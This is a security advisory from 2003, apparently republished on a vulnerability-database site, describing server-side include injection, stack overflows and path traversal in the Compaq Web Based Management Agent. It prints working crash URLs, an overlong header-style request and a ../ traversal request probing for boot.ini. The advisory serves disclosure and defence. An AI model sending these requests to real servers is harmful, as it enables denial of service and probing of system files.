Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

compaq.txt

🗓️ 30 Jun 2003 00:00:00Reported by Ian VitekType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

Several vulnerabilities found in Compaq Web Based Management Agent causing server issues.

Code
`SSI vulnerability in Compaq Web Based Management Agent  
======================================================  
  
Type of vulnerabilities:  
Server Side Include injection. Exploitable.  
Stack overflows and access violations. Exploitable?  
Creation of script objects. Exploitable?  
  
Affected Software: Compaq Web Based Management Agent  
Verified Platforms: Windows  
  
Background and problem description  
==================================  
Bashis (bash at wcd.se) has found several vulnerabilities  
in Compaq Web Based Management Agent. This Agent runs on  
TCP port 2301 (HTTP) or 2381 (HTTPS).  
The agent uses "tags" to run funktions at the server side.  
To list all tags:  
http://IP:2301/<!.TableDisplayTags>   
  
To crash the agent:  
http://IP:2301/<!>  
Stack overflow (0xc00000fd), Address: 0x77f0c3dc  
http://IP:2301/survey/<!>  
Stack overflow (0xc00000fd), Address: 0x10039869  
  
This crashes the agent too:  
http://IP:2301/<!.StringRedirecturl>  
Stack overflow (0xc00000fd), Address: 0x77f0c3dc  
http://IP:2301/<!.StringHttpRequest=Url>  
Stack overflow (0xc00000fd), Address: 0x77f0c3dc  
http://IP:2301/survey/<!.StringHttpRequest=Url>  
Stack overflow (0xc00000fd), Address: 0x10039869  
  
The cause could be an endless loop (the result  
contains a tag to display an URL, and the result  
contains a tag to display an URL, and the result...)  
  
More strange stack overflows:  
http://IP:2301/<!.ObjectIsapiECB>  
Stack overflow (0xc00000fd), Address: 0x77f0c3dc  
  
Many tags take input that seems vulnerable:  
http://IP:2301/<!.StringIsapiECB=lpszPathInfo>  
Stack overflow (0xc00000fd), Address: 0x77f0c3dc  
  
Netcat following:  
GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0  
Access violation (0xc0000005), Address: 0x100368a5  
  
Check file existens. (with a nice 'input box')  
http://IP:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini  
  
It looks like you could create script objects.  
Check the tags with <!.TableDisplayTags>. Some of the  
CreateObject tags has the parameter 'script'.  
I don't know if it could be done though.  
  
Is this just another remote DoS?  
  
I have mailed HP ([email protected]) and got an automated  
response 28/5 2003.  
  
If someone want to forward this mail they may do so.  
  
To all of my friends; See you in Vegas!  
The Swedes are comming.  
//Ian Vitek  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
30 Jun 2003 00:00Current
7.4High risk
Vulners AI Score7.4
vulnerability identificationcompaq softwareserver side include injectionstack overflowaccess violationtcp porthttp protocolendless loop issuescript object creationinput validation
23